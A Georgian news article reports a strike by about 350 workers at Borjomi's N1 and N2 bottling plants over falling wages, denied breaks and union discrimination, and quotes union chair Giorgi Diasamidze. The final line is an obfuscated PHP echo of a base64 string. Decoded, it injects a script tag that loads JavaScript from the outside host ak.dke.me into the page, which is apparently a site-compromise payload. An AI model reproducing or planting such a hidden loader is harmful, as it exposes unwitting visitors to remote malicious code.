gorgia
ავერსი jaluzi
ბორჯომის N1 და N2 ჩამომსხმელი ქარხნების 350-მდე თანამშრომელი გაიფიცა - ინფორმაციას ამის შესახებ აგრარული მეურნეობის, ვაჭრობისა და მრეწველობის პროფესიული კავშირი ავრცელებს.
 
მათივე ცნობით, გაფიცულები ხელფასის მომატებას და სამუშაო პირობების გაუმჯობესებას ითხოვენ. ადგილზე მობილიზებულულია პოლიცია.
 
„ამ დრომდე ადმინისტრაციის მხრიდან არავინ გამოსულა და გაფიცულებთან კომუნიკაცია არ ქონია. გაფიცულები ამბობენ, რომ ადმინისტრაციის მხრიდან შანტაჟი და მუქარა მოდიოდა, თუ ისინი გაიფიცებოდნენ, სამსახურს დაკარგავდნენ. მათი ძირითადი მოთხოვნები ხელფასების ზრდას, დასვენებისა და შესვენების უფლების ქონასა და კომპანიაში პროფკავშირული ნიშნით დისკრიმინაციის აკრძალვას ეხება.
 
დასაქმებულთა თქმით, მათი ხელფასები ერთი წლის განმავლობაში 200-250 ლარით იკლებდა. კადრების სიმცირის გამო შესვენებით ვერ სარგებლობენ და ზეგანაკვეთურ სამუშაოს მხოლოდ მცირე ნაწილს უხდიდნენ“, - ამის შესახებ BUSINESS TIME-ის აგრარული მეურნეობის, ვაჭრობისა და მრეწველობის პროფესიული კავშირის თავმჯდომარე გიორგი დიასამიძემ განუცხადა.
 
მისი თქმით, გაფიცვა დასაქმებულების მოთხოვნის დაკმაყოფილებამდე არ შეწყდება.
1278
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");